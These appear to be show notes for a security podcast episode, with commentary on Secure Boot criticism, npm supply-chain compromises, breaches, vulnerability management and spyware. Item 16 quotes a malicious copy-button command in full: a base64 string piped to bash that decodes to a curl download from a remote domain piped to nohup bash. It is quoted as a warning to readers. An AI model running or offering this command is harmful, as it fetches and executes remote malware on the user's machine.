Americans Can’t Hack It – PSW #891

Paul Asadoorian

1. Apple’s new Memory Integrity Enforcement system deals a huge blow to spyware developers
2. npm Author Qix Compromised via Phishing Email in Major Suppl…
3. Exploiting the Impossible: A Deep Dive into A Vulnerability Apple Deems Unexploitable
4. Some People Are Really Crapping All Over Secure Boot

   There is a 10 part series, all about how Microsoft and Secure Boot are evil and calling the Secure Boot expiration of certificates things such as "The Secure Boot 9/11". Don't believe the hype. You should enable Secure Boot on your systems. Does it have problems? Certainly. This does not mean you should not use it as any security solution is not perfect. There is a lot of axe grinding, even law suites filed against security researchers going on according to this site. It comes up often in my automated searches for UEFI and Secure Boot. Most of it is FUD, for example they state: "One might say that Microsoft staged a coup against BIOS" - That's not the case at all. Check out my Below The Surface podcast for more information about UEFI, including interviews with folks such as Vince Zimmer on how it came to be. Finally, if you are that unhappy with state of Secure Boot, It is possible to fully create and manage your own Secure Boot keys and a root of trust for your system, giving you independent control with no reliance on vendor or Microsoft certificates.

5. PoC Exploit Released for ImageMagick RCE Vulnerability – Update Now
6. Leveraging Raw Disk Reads to Bypass EDR
7. Subverting code integrity checks to locally backdoor Signal, 1Password, Slack, and more
8. TLS NoVerify: Bypass All The Things
9. Stealthy Persistence With Non-Existent Executable File
10. I Hacked BellaBot and Every Robot from China’s Biggest Robotics Company (Pudu Only Fixed It When I Told Their Clients)
11. GitHub – ericescobar/MeshC2
12. MeetC2 a.k.a Meeting C2
13. Inline Style Exfiltration: leaking data with chained CSS conditionals
14. Start hacking Bluetooth Low Energy today! (part 3)

    Nice primer on how to use the nRF5340 Dev Kit (https://www.nordicsemi.com/Products/Development-hardware/nRF5340-DK), I picked up mine from Digikey for $49 (https://www.digikey.com/en/products/detail/nordic-semiconductor-asa/NRF5340-DK/13544603?utmsource=oemsecrets&utmmedium=aggregator&utm_campaign=buynow)

15. ZDI-25-884 – QEMU uefi-vars Uninitialized Memory Information Disclosure Vulnerability

    "The specific flaw exists within the uefi-vars device. The issue results from the lack of proper initialization of memory prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the emulator." - I feel like this is something I would use when emulating UEFI in Qemu, which I've done once (through this project, which was developed by my co-workers: https://github.com/hacking-support/DVUEFI). Always good to make sure you keep your tools up-to-date. Of course, this is a double edged sword. Sure, you may be testing some firmware/software or malware sample, but when it attacks your system it could be a bad day. On the flip side, its often super difficult to get all of your tools working that upgrading a component could also be a bad day. Example: I recenlty started building VMs running Ubuntu with different versions for different analysis software.

16. Tim Pierce (@unchi.org) – Copy and paste for malware

    All too often, we click the little copy button next to a command, then paste it and run it. In this case, it could have been a bad day:

    • The "Copy" button on that page copies the following text: ** echo "Y3VybCAtcyBodHRwczovL2dhbW1hLm1lc2hzb3J0ZXJpby5jb20vc3RyaXgvaW5kZXgucGhwIHwgbm9odXAgYmFzaCAm" | base64 -d | bash
    • and that base64 string actually expands to: ** curl -s httpx://gamma.meshsorterio.com/strix/index.php | nohup bash

    Don't let the bad days win!

17. Venezuela’s President Maduro said his Huawei Mate X6 cannot be hacked by US cyber spies

    There are just some things you don't say: "“Impressive, I find out everything through this, the phone that Xi Jinping gave me. Look, Xi Jinping gave me this, a Huawei, the best phone in the world, the Huawei, and the Americans can’t hack it, neither their spy planes, nor their satellites.” said Venezuela’s president," - Saying something cannot be hacked has not gone well. I don't believe whoever runs the Vegas sphere said they could not be hacked, but I haven't seen it get hacked yet. Oracle's Larry Ellison is quoted as saying: ""Oracle is the only software that’s unbreakable.". That was in 2015. Lots of Oracle vulnerabilties have been announced and exploited since then. Including this week: https://arstechnica.com/security/2025/09/as-hackers-exploit-one-high-severity-sap-flaw-company-warns-of-3-more/

    • Back to President Maduro, China has already hacked your phone as its likely to be pre-0wned or already infected. Allt he US needs to do is wake up the backdoor we planted in Huawei and gain access (Note: this is satire, I have no evidence to suggest that this is true, but its fun to talk about!)
18. This blog is running on a recycled Google Pixel 5

    Why would you do this? Easy: Because you can. I can just see server farms popping up running on everyone's old phones. Its one was to recycle them anyhow. There are several hacks to do this with laptops too.

19. How They Got In — DaVita Inc.

    So where did they go wrong? From the article:

    • "No MFA / VPN exposure → on critical VPN access solution — misconfiguration." - The other thing here is they were not monitoring the darkweb or external attack surface. If they were, they would have been changing credentials on accounts known to be compromised. Also, MFA across the board is super important.
    • "Unpatched servers → Secrets Platform / Vault Stack RCE and Metric Solution." - There was also an unpatched IP camera exposed to the Internet. Again, regular vulnerability scans and attack surface monitoring, then taking action on those, would have helped. We get too hung up on trying to scan and prioritize. What you have hanging on the Internet for all to see takes the top priority in my mind.
    • "Weak monitoring → Open directories and brand impersonation sites left active for months." - They did not do any brand monitoring (e.g. Domain tools or other ASM vendors) to identify phishing domains related to their company. If they were able to block or take down these domains, it would have been a good defensive step.
    • "A publicly traded company in the healthcare industry should not use WordPress as its primary web platform because its widespread plugin vulnerabilities and lack of default HIPAA compliance pose critical risks of data breaches, regulatory violations, and loss of patient trust." - Not sure I agree with this. All software is vulnerable, to what extent depends on the implementation.

    I don't want to shame them. They do have a CISO that has been there for 20+ years. It is not easy to defend a Fortune 500 publically traded company from attackers. However, hopefully things improve based on the report, which looks like it was published for free!

20. The Critical Failure in Vulnerability Management

    The article actually calls out 3 areas where vulnerability management is failing, I will expand on some of these thoughts:

    1. "There's comfort in being able to say, "Look at the breadth of what we've scanned." However, sometimes more is not better; more scans are just more scans." - When I worked in VM, this was one of the problems we chose to solve. That is, you have so many assets that you need to scan all of them, and whoever can identify the most vulnerabilities will win. Turns out we all lost. VM vendors climbed the "who can find the most stuff" mountain, rather than who can identify the most critical vulnerabilities and help teams remediate them.
    2. "Some vendors are faring better because they have been able to shift their business model from selling traditional vulnerability management to integrated risk management solutions, with a heavy emphasis on cloud." - The problem for VM with respect to the cloud is that we own less of the infrastructure and can spin up new infrastructure that is more secure by default, therefore, VM is not as crucial in cloud environments. However, VM vendors doubled down, acquiring container management companies like they were going out of style. Many problems arise, for example, development teams use different solutions to secure containers, and not the ones offered by VM vendors. This shift in focus took away from research and product features that could help in other areas, such as security and network appliances, which can be physical or virtual.
    3. "Increasingly, threat actors are exploiting vulnerabilities to bypass edge and network devices that are supposed to block their access. Once these devices are compromised, adversaries can move laterally and deeper into the network." - And if VM was really focusing here, we'd see better numbers in terms of remmediation and perhaps less attacker focus on edge devices. In reality, its not a pretty picture. This is pure gold as a statistic, though I did not fact check it: "Organizations are actively patching network device vulnerabilities; however, only 54% were fully remediated last year, and it took a median of 32 days to accomplish. Meanwhile, the average time to exploit vulnerabilities has dropped to five days."

    So what do we do? According to the article:

    1. Prioritizing what needs to be fixed based on intelligence about our network risk
    2. Incorporating automation to help us fix what's critical or deploy a workaround
    3. Closing the loop by double-checking to make sure vulnerabilities are remediated

    And if we could do all 3 of those things well we wouldn't need this article or the discussion, but yet, here we are.

21. Flipper Zero Car Hacks Exposed: What’s Real and What’s Hype

    Interesting defense recommendations:

    • Use “double-lock” or “deadlock” modes (where available) and disable passive entry in settings if your car supports it; this prevents the car from waking for a hands-free handshake, which many emulator devices exploit. (Check your owner’s manual.)
    • RF-protect key fobs at home (Faraday pouches/boxes) to blunt basic relay attacks; keep the spare far from doors/windows.
    • Layer visible deterrents (steering-wheel locks, driveway posts) with hidden ones (aftermarket immobilizers, OBD port locks) so an unlocked door doesn’t equal a stolen car.
    • Update vehicle software promptly; if your brand offers an anti-theft update—even a paid one—consider it until regulators force broader recalls.

    and some have even pointed out that we are moving towards facial recognition to start your car: https://www.webpronews.com/facial-recognition-in-cars-boosting-security-against-high-tech-theft/

    All these things may make it harder to break into or steal your vehicle, but the real answer is to fix the security problems before the cars ship and design solutions that are harder to defeat by criminals.

22. darkmentorllc/Blue2thprinting – Xeno’s Bluetooth Stuff Is Awesome

    Some of the best Bluetooth recon research is here. Now complete with free 8.5 hours of training and detailed hardware guides and links to purchase all the things. Caution: You will spend some of your hard earned money here, but so worth it. I picked up a few things already.

23. How Has IoT Security Changed Over the Past 5 Years?

    I'd argue it has not. The article points out things we've talked about on the show, nothing really new here. So how do we solve the IoT (in)security problem(s)? Here's a summary of my thoughts:

    1. Legislation - Historically, this has not worked, nor have legislative efforts implemented been effective. Forcing vendors not to have default passwords is just part of the problem. And solutions are only implemented moving foward. There have been some fines and some prohibitions against certain vendors, but its not even scratching the surface. We need smart legislation and hard and fast requirements that must be met in order to bring a product to the market, balanced with keeping the ability to enter the market easy.
    2. Incentives - Consumers and vendors will only act if there are positive incentives. New hardware that comes from the ISPs that gets rid of old and vulnerable devices would help. This is my "Save The Internet One IoT Device At Time" program that would need funding and incentivse ISPs and consumers to replace older devices.
    3. IoT Device Lockdown Mode - Vendors could implement protections, such as signed software, on the devices and other countermeasures to make it more difficult to successfully attack. There is no reason for authentication bypass and command injection vulnerabilities to be so easily exploited.
24. Linux – Recreating old problems with new tools

    I am a little dizzy after reading this article. I think it boils down to this:

    • The nice thing about package managers is there are so many of them
    • The nice thing about Linux distros is there are so many of them
    • The nice thing about app stores is there are so many of them

    The open ecosystem of Linux is what hurts adoption as a desktop platform. Just because you can customize something, doesn't mean you should, yet most of the Linux ecosystem is compromised of customizations for kernels, userland, software, package management, etc... This HURTS security as it creates too much attack surface for anyone to defend well, except when you create your own standards for implementation and deployment of Linux.

25. Exploit development for IBM i

    "And just like that, we had an interactive shell with full command output, running entirely within IBM i’s own environment, with no need for external binaries or reverse connections." - Nice work! I enjoyed how they were able to convert all the things to EBCDIC to get it working. Also, IBM i systems are just AS/400s, here's the AI slop:

    • The original AS/400, launched in 1988, was a midrange server running the OS/400 operating system, known for its integrated hardware/software design, reliability, and use of the RPG programming language.
    • Over the years, the platform underwent several rebrandings: it became the iSeries, then System i, and finally IBM i (the OS) running on Power Systems servers.
    • The IBM i operating system embodies all advancements and retains strong backward compatibility—most applications written for AS/400 can run on modern IBM i systems with minimal changes, but the hardware and software have evolved substantially.

    Why do we care? Here's the AI slop on who uses IBM i:

    • Banking and Finance: Major banks like HSBC use IBM i for core banking operations thanks to its uptime and data integrity.
    • Insurance: Companies such as United Heritage Insurance leverage IBM i for transactional backend operations, modernizing interfaces via APIs and web platforms.
    • Manufacturing and Automotive: Firms like Kawasaki and Avesco AG use IBM i to run ERP, manufacturing, and analytics workloads, deploying both on-prem and in the cloud.
    • Retail and Distribution: Retailers and logistics companies depend on IBM i for inventory, supply chain, and customer-facing functions, often integrating with digital and cloud tools.
    • Telecommunications: Operators like Orange run operational and billing systems on IBM i, updating software to boost performance and extend the life of core applications.
    • Public Sector & Government: Various banks and government agencies use IBM i for secure ledgers, citizen services, and financial infrastructure, especially where uptime and security are paramount.
26. Resolved Authentication Bypass Vulnerability in Sophos AP6 Series Wireless Access Points Firmware (CVE-2025-10159)

    AI Slop summary: "Sophos resolved a critical authentication bypass vulnerability (CVE-2025-10159) in its AP6 Series Wireless Access Points that allowed attackers to gain admin-level privileges if they could access the management IP address. Firmware version 1.7.2563 (MR7), released after 11 August 2025, contains the fix. Users with automatic updates are already protected, while those who disabled auto-updates must manually upgrade to receive the patch."

27. Vibe Coding: A Pentester’s Dream
    • TL;DR: They vibe coded a web app and told the LLM to secure it in specific ways. Then they did a pen test on it, and discovered vulnerabilities.
    • The answer? "You need to have your application penetration tested! Specifically, tested by people who have the ability to understand how the application should behave and can perform security tests based on that expectation."
    • I vibe coded a shell script today. It called functions that it somehow forgot to create. Twice. Very weird. It also did not put in error checking where it needed to. Vibe coding is still a junior programmer at best. But since I have some programming experience it still saved me time. And there's the key, AI can help programmers with experience!
    • A pen test is a great thing, but not the answer here. There are many steps involved in creating secure, reliable, and resilient software. A pen test is one small step, but I'd argue all the other steps are more important.

Bill Swearingen

1. HexStrike AI MCP Agents

   HexStrike AI MCP Agents is an advanced MCP server that lets AI agents (Claude, GPT, Copilot, etc.) autonomously run 150+ cybersecurity tools for automated pentesting, vulnerability discovery, bug bounty automation, and security research. Seamlessly bridge LLMs with real-world offensive security capabilities.

2. plex has been hacked (again)

   We have recently experienced a security incident that may potentially involve your Plex account information. We believe the actual impact of this incident is limited; however, action is required from you to ensure your account remains secure. What happened

   An unauthorized third party accessed a limited subset of customer data from one of our databases. While we quickly contained the incident, information that was accessed included emails, usernames, securely hashed passwords and authentication data.

   Reset your passwords

3. How ICE Is Using Fake Cell Towers To Spy On People’s Phones

   In a recently-unsealed search warrant reviewed by Forbes, ICE used such a cell-site simulator in an attempt to track down an individual in Orem, Utah. The suspect had been ordered to leave the U.S. in 2023, but is believed to still be in the country. Investigators learned last month that before going to Utah, he’d escaped prison in Venezuela where he was serving a sentence for murder, according to the warrant. He’s also suspected of being linked to gang activity in the country, investigators said.

4. Tomorrow’s Emoji, Today: Unicode 17.0 Has Arrived

   Bill is salty about this, my emoji was not accepted in Unicode 17. Once a year, Unicode drops its annual update: thousands of new characters, new scripts, new symbols, and of course… new emoji. Today marks the release of Unicode 17.0, adding 4,803 characters (bringing the grand total to 159,801!)

5. You Already Have Our Personal Data, Take Our Phone Calls Too (FreePBX CVE-2025-57819)

   Today, inside this hellscape we call the Internet, a mean person has discovered a zero-day(s) in FreePBX (now lovingly called CVE-2025-57819). But they didn’t stop there - the dastardly individual(s) then proceeded to exploit FreePBX hosts en-masse.

6. Can I have a new password, please? The $400M question.

   Back in August 2023, attackers tied to the Scattered Spider group didn’t exploit a zero-day vulnerability to hack Clorox. They simply called the service desk (run by Cognizant), claimed to be locked-out employees, and asked for password and MFA resets.

   According to court filings and reporting, the attacker repeatedly phoned Cognizant’s service desk, obtained repeated resets without meaningful verification, and used the resulting access to move quickly toward domain-admin footholds.

   Clorox says the attack ultimately led to roughly $380 million in damages, including about $49 million in remedial costs and “hundreds of millions” in business-interruption losses. We’ll walk through what happened, how to secure third-party service desks, and show how to enforce verification with the right technology.

7. Signal adds secure cloud backups to save and restore chats

   Signal has introduced a new opt-in feature that helps users create end-to-end encrypted backups of their chats, allowing them to restore messages even if their phones are damaged or lost.

   Secure backups are already available in the latest Signal beta version for Android users and will also be rolled out to iOS and desktop devices after this testing phase.

   "If you do decide to opt in to secure backups, you'll be able to securely back up all of your text messages and the last 45 days' worth of media for free. If you want to back up your media history beyond 45 days, as well as your message history, we also offer a paid subscription plan for US$1.99 per month," said Jim O'Leary, Signal's VP of Engineering.

8. ICE Has Spyware Now

   The Trump administration this week rescinded a Biden administration order that blocked the ICE from obtaining hacking tools sold by Paragon, the Israeli firm with which it signed a $2 million contract last September. Now ICE will have access to the company’s spyware, including tools for remotely breaking into phones and obtaining their contents and messages.

   Paragon has been compared to the more notorious Israeli spyware firm NSO Group, with similar examples of its tools being used to spy on journalists and activists: WhatsApp said earlier this year that it had discovered Paragon’s spyware being used against activists and journalists in Europe, and two Italian media outlets filed a criminal complaint with prosecutors seeking an investigation into the hacking incidents. As a result of that blowup, Italian intelligence services canceled a contract with the company, according to Israeli news outlet Haaretz.

Larry Pesce

1. An Attacker’s Blunder Gave Us a Look Into Their Operations
2. Detecting Password-Spraying with a Honeypot Account
3. npm debug and chalk packages compromised
4. This Week In Security: DNS Oops, Novel C2s, And The Scam Becomes Real
5. A University of Oregon student reported a troubling online privacy lapse. The university placed him under investigation
6. Venezuela’s President Maduro said his Huawei Mate X6 cannot be hacked by US cyber spies
7. Google Confirms Android Attacks—No Fix For 1 Billion Phones
8. Identity 4 – 2025
9. Researchers find spyware on phones belonging to Kenyan filmmakers
10. A parliament in flames, a leader toppled. Nepal Gen-Z protesters ask: what comes next?